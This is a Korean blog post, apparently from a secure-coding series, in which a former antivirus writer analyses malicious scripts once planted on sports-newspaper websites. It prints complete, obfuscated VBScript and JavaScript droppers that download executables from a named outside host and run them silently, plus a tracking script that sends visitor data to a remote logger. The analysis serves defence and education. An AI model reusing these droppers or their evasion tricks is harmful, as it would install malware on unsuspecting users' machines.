시큐어코딩편 - (2) 악성코드 럴커처럼 잠복한 사이트들

 

 

악성코드가 뚫고 들어온 사이트를 볼때마다 많이 캡처해놨어야하는데,  귀찮다는 이유로 저장해놓지않았던게  지금 후회막급이다.

 

증거자료를 보여드려야 믿을텐데, 안랩사이트에 5년동안 써놓은 게시물들은 뤱사이트개편으로 다 사라졌고, 이젠 검색도 안된다.

 

악성코드 럴커가 뚫고 들어와 잠복해있던 사이트들의 증거를 몇가지 보며 , 하나하나 살펴보자

 

VB스크립트나 자바스크립트, 키로거 형태로도 웹페이지 스포츠신문 사이트 만화란에 버젓이 숨어있었다. 마치 먹이를 노리는 럴커처럼.

 

 

먹이를 찾아 산기슭을 헤메다니는 하이에나처럼 스포츠신문 사이트 웹페이지를 이곳저곳 돌아다니다보면 버젓이 악성코드가 발견되었다는 경고를  낸다.

 

PC 빛자루라는 지금은 종료된 안랩 서비스인데, 악성코드를 쓸어버린다는 의미를 가졌다. 그림처럼 키로거 스파이웨어를 차단한다. 아유 내 PC의 빛타민 같으니라고.

 

 

 

 

 

 

 

 

 

 

zzxy.vbs 악성코드 스크립트

 

zzxy.exe를 다운받게 하려는 의도

백신의 검사를 피하기위해 문자열들을 chr() 함수로 다 치환시켜놓았다.

 

 

Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://seoholo.cafe24.com/zzxy.exe",0
execute(chr(120)&chr(80)&chr(111)&chr(115)&chr(116)&chr(46)&chr(83)&chr(101)&chr(110)&chr(100)&chr(40)&chr(41)&chr(13)&chr(10)&chr(83)&chr(101)&chr(116)&chr(32)&chr(115)&chr(71)&chr(101)&chr(116)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(65)&chr(68)&chr(79)&chr(68)&chr(66)&chr(46)&chr(83)&chr(116)&chr(114)&chr(101)&chr(97)&chr(109)&chr(34)&chr(41)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)&chr(116)&chr(46)&chr(77)&chr(111)&chr(100)&chr(101)&chr(32)&chr(61)&chr(32)&chr(51)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)&chr(116)&chr(46)&chr(84)&chr(121)&chr(112)&chr(101)&chr(32)&chr(61)&chr(32)&chr(49)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)&chr(116)&chr(46)&chr(79)&chr(112)&chr(101)&chr(110)&chr(40)&chr(41)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)&chr(116)&chr(46)&chr(87)&chr(114)&chr(105)&chr(116)&chr(101)&chr(40)&chr(120)&chr(80)&chr(111)&chr(115)&chr(116)&chr(46)&chr(114)&chr(101)&chr(115)&chr(112)&chr(111)&chr(110)&chr(115)&chr(101)&chr(66)&chr(111)&chr(100)&chr(121)&chr(41)&chr(13)&chr(10)&chr(115)&chr(71)&chr(101)&chr(116)&chr(46)&chr(83)&chr(97)&chr(118)&chr(101)&chr(84)&chr(111)&chr(70)&chr(105)&chr(108)&chr(101)&chr(32)&chr(34)&chr(67)&chr(58)&chr(92)&chr(78)&chr(84)&chr(68)&chr(69)&chr(84)&chr(66)&chr(67)&chr(84)&chr(46)&chr(101)&chr(120)&chr(101)&chr(34)&chr(44)&chr(50)&chr(32)&chr(13)&chr(10)&chr(119)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(115)&chr(108)&chr(101)&chr(101)&chr(112)&chr(32)&chr(49)&chr(48)&chr(48)&chr(48)&chr(32)&chr(13)&chr(10)&chr(119)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(99)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(111)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(119)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(115)&chr(104)&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(46)&chr(114)&chr(117)&chr(110)&chr(32)&chr(34)&chr(67)&chr(58)&chr(92)&chr(78)&chr(84)&chr(68)&chr(69)&chr(84)&chr(66)&chr(67)&chr(84)&chr(46)&chr(101)&chr(120)&chr(101)&chr(34)&chr(44)&chr(49))

 

 

 

 

악성코드 - 일반 HTML문을 유니코드형태로 치환

%3Cscript language%3D%22VBScript%22%3E 는  <script language="VBScrpt"> 로 치환된다.

 

 

 

[SCRIPT]var Words="  %3Chtml%3E%0D%0A  %3Cscript language%3D%22VBScript%22%3E%0D%0A  on error resume next%0D%0A  dl %3D %22http%3A%2F%2Fseoholo%2Ecafe24%2Eco%2Ekr%2Fuuu%2Eexe%22%0D%0A  Set df %3D document%2EcreateElement%28%22object%22%29 %0D%0A  df%2EsetAttribute %22classid%22%2C %22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22  %0D%0A  str%3D%22Microsoft%2EXMLHTTP%22     %0D%0A  Set x %3D df%2ECreateObject%28str%2C%22%22%29  %0D%0A  a1%3D%22Ado%22 %0D%0A  a2%3D%22db%2E%22  %0D%0A  a3%3D%22Str%22  %0D%0A  a4%3D%22eam%22   %0D%0A  str1%3Da1%26a2%26a3%26a4   %0D%0A  str5%3Dstr1   %0D%0A  set S %3D df%2Ecreateobject%28str5%2C%22%22%29   %0D%0A  S%2Etype %3D 1    %0D%0A  str6%3D%22GET%22    %0D%0A  x%2EOpen str6%2C dl%2C False     %0D%0A  x%2ESend    %0D%0A  fname1%3D%22emtv%2Ecom%22 %0D%0A  set F %3D df%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29 %0D%0A  set tmp %3D F%2EGetSpecialFolder%282%29   %0D%0A  S%2Eopen   %0D%0A  fname1%3D F%2EBuildPath%28tmp%2Cfname1%29  %0D%0A  S%2Ewrite x%2EresponseBody   %0D%0A  S%2Esavetofile fname1%2C2   %0D%0A  set Q %3D df%2Ecreateobject%28%22Shell%2EApplication%22%2C%22%22%29      %0D%0A  S%2Eclose %0D%0A  Q%2EShellExecute fname1%2C%22%22%2C%22%22%2C%22open%22%2C0   %0D%0A  %3C%2Fscript%3E   %0D%0A  %3Chead%3E   %0D%0A  %3Ctitle%3E攣瞳契瘻，헝된덤%3C%2Ftitle%3E  %0D%0A  %3C%2Fhead%3E%3Cbody%3E %0D%0A   %3Ccenter%3E攣瞳契瘻，헝된덤······· %3C%2Fcenter%3E%0D%0A  %3C%2Fbody%3E%3C%2Fhtml%3E%0D%0A";document.write(unescape(Words))[/SCRIPT]
[!-- new  --]
[script language='javascript' id='log_script' src='http://weblog004.cafe24.com/weblog.js?uid=woshifeng_8&uname=dreamwiz'][/script]
[!-- new  --]

 

 

 

 

 

유니코드 치환 악성코드를 본래의 Vb스크립트 코드로 원상복구하면 이런 평범해보이는 ASP코드이다.

 

 

  <html>
  <script language="VBScript">
  on error resume next
  dl = "http://seoholo.cafe24.com/zzxy.vbs"
  Set df = document.createElement("object")
  df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" 
  str="Microsoft.XMLHTTP"    
  Set x = df.CreateObject(str,"") 
  a1="Ado"
  a2="db." 
  a3="Str" 
  a4="eam"  
  str1=a1&a2&a3&a4        // Adodb.stream 문자열 조합 
  str5=str1  
  set S = df.createobject(str5,"")  
  S.type = 1   
  str6="GET"   
  x.Open str6, dl, False    
  x.Send   
  fname1="emtv.com"
  set F = df.createobject("Scripting.FileSystemObject","")
  set tmp = F.GetSpecialFolder(2)  
  S.open  
  fname1= F.BuildPath(tmp,fname1) 
  S.write x.responseBody  
  S.savetofile fname1,2  
  set Q = df.createobject("Shell.Application","")     
  S.close
  Q.ShellExecute fname1,"","","open",0  
  </script>  
  <head>  
  <title>攣瞳契瘻，헝된덤</title> 
  </head><body> <script language=javascript src="xp.js"></script>
   <center>攣瞳契瘻，헝된덤······· </center>
  </body></html>
<script language='javascript' id='log_script' src='http://weblog004.cafe24.com/weblog.js?uid=woshifeng_11&uname=seoholo'></script>

 

 

 

 

 

 

 

  

연결되어있던 xp.js 악성코드

6511.exe를 다운받게 하려는 의도

백신의 검사를 피하기위해 문자열들을 다 조각조각 쪼개놓았다.

 

 

var    filename="DNS.exe"    //匡숭츰
var    url="http://seoholo.cafe24.com/6511.exe";   
var    obj=document.createElement("object");
obj.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var    str="Microsoft.XMLHTTP";   
var    xmlhttp    =    obj.CreateObject(str,"");
var    adob=obj.createobject("AD"+"OD"+"B.Stream","");    // ADODB.stream 문자열 조합처리
adob.Type=1;
eval('xmlhttp.op'+'en("GET",url,false)');   // xmlhttp.open("GET", url, false);  조합처리 
eval("xmlh"+"ttp.send()");     // xmlhttp.send(); 조합처리 
eval("adob.Op"+"en()");       // adob.Open() 조합처리   
var    f    =    obj.createobject("Scripting.FileSystemObject","");
var    fname=filename;   
var    tmp    =    f.GetSpecialFolder(1);
fname=f.BuildPath(tmp,fname);
eval("adob.w"+"rite(xmlhtt"+"p.respo"+"nseBody)");    // xmlhttp.responseBody 조합처리  
  
adob.SaveToFile(fname,2);
adob.Close();
var    runc    =    obj.createobject("She"+"ll.Appl"+"ication","");     // Shell.Application 조합처리
eval('runc.She'+'llExe'+'cute(fname,"","","open",0)');                     // runc.ShellExecute 조합처리

 

 

 

 

 

 

weblog.js 악성코드 스크립트

 

 

var s_uid;var s_uname;var ref;var doc_uid;var src_path;

if (document.all) {

src_path = document.all.log_script.src;

} else {

src_path = document.log_script.src;

}

var uid_end = src_path.lastIndexOf("uid=",src_path);

var uname_start = src_path.indexOf("uname=",src_path);

var uname_end = src_path.lastIndexOf("uname=",src_path);

s_uid=src_path.substring(uid_end+4,uname_start-1);

s_uname=src_path.substring(uname_end+6,src_path.length);

var s_url = document.URL;

if (document.referrer) {

ref=document.referrer;

} else {

if (typeof(opener) == "object") {

if (typeof(opener.document) != "unknown") {

ref = opener.document.URL;

}

}

if (! ref) {

if (typeof(parent) == "object" ) {

if (typeof(parent.document) != "unknown") {

ref = parent.document.referrer;

}

}

if (! ref) {

if (typeof(parent.opener) == "object" ) {

if (typeof(parent.opener.document) != "unknown") {

ref = parent.opener.document.referrer;

}

}

}

}

}

if (! ref) {

if (typeof(opener) == "object" ) {

if (typeof(opener.parent) == "object" ) {

if (typeof(opener.parent.document) != "unknown") {

ref = opener.parent.document.referrer;

}

}

}

}

if (document.all) {

doc_uid=s_uid+'&udim='+window.screen.width+'*'+window.screen.height+'&uref='+ref+'&uname='+s_uname+'&url='+s_url;

document.all.log_script.src='http://weblog004.cafe24.com/log.php?uid='+doc_uid;

} else {

doc_uid=s_uid+'&udim='+window.screen.width+'*'+window.screen.height+'&uref='+ref+'&uname='+s_uname+'&url='+s_url;

document.log_script.src='http://weblog004.cafe24.com/log.php?uid='+doc_uid;

}

 

 

 

 

 

 

 

 

계속 연재됩니다.